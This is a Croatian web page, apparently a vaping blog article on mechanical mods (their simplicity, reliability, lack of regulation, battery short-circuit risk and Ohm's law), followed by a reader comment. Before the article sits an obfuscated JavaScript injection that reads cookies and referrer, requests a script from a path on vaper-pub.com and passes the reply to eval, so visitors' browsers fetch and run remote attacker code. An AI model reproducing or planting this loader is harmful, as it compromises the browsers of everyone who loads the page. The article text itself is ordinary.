;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Što su zapravo mehanički modovi

Modovi ili mehaničke tube temelje se na vrlo jednostavnom operativnom procesu, a upravo to ih razlikuje od elektroničkih modela. To je jednostavno kutija ili cijev s baterijom, tipkom za okidanje i konektorom. Ukratko, tuba na baterije s tipkom. 

Stoga, u principu, nema elektronike, sve je mehanički, otuda i njihovo ime. Kada je aktivirana, baterija izravno napaja zavojnicu i atomizer. 

Prednosti

Pouzdanost je primarna prednost mech modova. Kako nema elektronike, ne postoji opasnost od njenog kvara, a mehanički mod može trajati desetljećima. U najgorem slučaju, opruga s tipkom može na kraju izgubiti svoju elastičnost, ali će je biti lako zamijeniti. Ovo je glavni argument jer je pouzdanost ključna kod parenja, a ako se vaš uređaj pokvari, u principu će ga biti veoma lako, brzo i jeftino popraviti.  

Jednostavnost je također veliki argument u korist mech modova. Nema uputa za učenje, nema sitnih nedešifriranih znamenki i složenih uputa na zaslonu, nema gumba posvuda i prvenstveno nema potrebe za brigom o postavkama. Jednostavno pritisnete gumb za vape i parite. Jednostavan i učinkovit u jednakoj mjeri. 

Zapravo, mehanički modovi su bez premca u smislu učinkovitosti. Nema elektronike koja bi potrošila bateriju, koja će stoga dulje trajati. Sva snaga i životni vijek baterije ići će ravno na otpornu zavojnicu, i to samo kada je u upotrebi. Nema stanja pripravnosti, a samim time ni potrošnje baterije kada ne parite. Elektronička regulacija kutije uzrokuje gubitke između 5% i 15% utrošene energije. Kaže se da je njihova “učinkovitost” 85 do 95%. Kod mech modova učinkovitost je 100%. 

Konačno, mehanički modovi nude još jedan način vejpanja. Mehanički vaping ima neospornu draž. To također proizlazi iz velike raznolikosti meh kutija i cijevi. Ovdje na scenu stupaju kreatori modifikacija, nudeći originalnije i često visokokvalitetne modele. Nedostatak elektronike pojednostavljuje proces stvaranja i oslobađa od ograničenja tipki i drugih zaslona. Neki kreatori modova očito stvaraju elektroničke modove, ali mehanički modovi, a posebno cijevi, ostaju omiljeno igralište za najinovativnije među njima. 

Uz mehanički mod, točno znate što se događa, što radite, kako biste dobili upravo iskustvo vapinga koje tražite. To je kao šarm klasičnih automobila na kojima sve popravke možete sami obaviti pod uvjetom da ste malo spretniji, za razliku od modernih automobila na kojima ne možete ništa bez nedostupnih alata i mjernih instrumenata. Međutim, baš kao i automehaničari, morate biti predani učenju i provesti neko vrijeme usavršavajući svoje vještine. 

Nedostaci

Mehanički modovi su uglavnom zamijenjeni elektroničkim modelima zbog nekoliko mana, točnije nekoliko većih nedostataka. 

Prva je, daleko, sigurnost. U mech modu, zavojnica je u izravnom kontaktu s baterijom. U slučaju kratkog spoja, baterija će se pregrijati i, ovisno o modelu, može eksplodirati. Stoga je ključna uporaba odgovarajuće baterije, koja će se u najgorem slučaju isprazniti, ali ne i eksplodirati, u mehanizmu. Neke baterije također uključuju zaštitu od kratkog spoja; očito, one su poželjniji izbor. Kod elektroničkih kutija krug je zaštićen, a baterija nije u izravnom kontaktu s raspršivačem. 

Ipak, to ne znači da su mehanički modovi opasni. To je samo u slučaju kada dođe do instalacijske ili pogonske pogreške. Ukoliko znate i razumijete što radite, mehanički modovi su iznimno sigurni. Problemi se obično javljaju kod onih koji misle da znaju, unatoč znatnim prazninama u znanju ili iskustvu. 

Neki mehanički modovi također imaju sustave osigurača, od kojih su neki elektronički. Oni jednostavno prekidaju strujni krug kada struja postane previsoka ili se temperatura pretjerano poveća. Ova sigurnosna značajka ih ne čini elektroničkim modifikacijama: postavka je još uvijek električno u izravnom kontaktu s baterijom i nema regulacije. Jedini elektronički dijelovi bili bi osigurači. 

Drugi nedostatak leži u nedostatku regulacije. S elektroničkim modom, ako želite 20 W, to je ono što ćete dobiti dok se baterija ne isprazni. Kod mech moda nema takve regulacije. Snaga vapinga koju koristite izravno ovisi o otporu vašeg grijača i naponu baterije koji se smanjuje kako se baterija prazni. Stoga ćete dobiti znatno veće oblake s punom baterijom nego s praznom baterijom, a također i snažnije vejpanje na 0,5 Ohma nego na 1 Ohm. 

Da biste odredili svoju snagu vapinga, morate se uhvatiti ukoštac s Ohmovim zakonom. Ova formula će vam pomoći da izračunate snagu na temelju otpora vaše postavke (u Ohmima) i napona vaše baterije (u voltima).

Ohmov zakon je posebno važan za izračunavanje struje u amperima izvučene iz vaše baterije, što će također ovisiti o otporu vašeg uređaja. Što je ovaj otpor manji, to je veća snaga vašeg vapinga i viša je razina struje (Ampera) iz vaše baterije. Nikada ne smijete prekoračiti maksimalni trenutni kapacitet baterije, inače će se zagrijati i otpliniti. 

Pogodit ćete, treći nedostatak mech modova je to što nisu baš tako jednostavni kao što se čine. Naravno, postoji samo jedna tipka i nema postavki, ali te postavke su određene otporom atomizera, načinom postavljanja, brzinom pražnjenja baterije. Postavke elektroničke kutije odjednom se čine manje kompliciranima, i to s pravom. 

Choose your Reaction!
  • Frend ima neki mehanički mod/tubu (znao sam koji, al’ se ne mogu sad sjetiti) koji je upario sa Hellvape Dead Raabit v2 RDA i sa 0.40 Ohma coilom u atomizeru pari na 27W.
    Veli da mu je iskustvo parenja top i da razmišlja nabaviti još koji mehanički mod.

Leave a Comment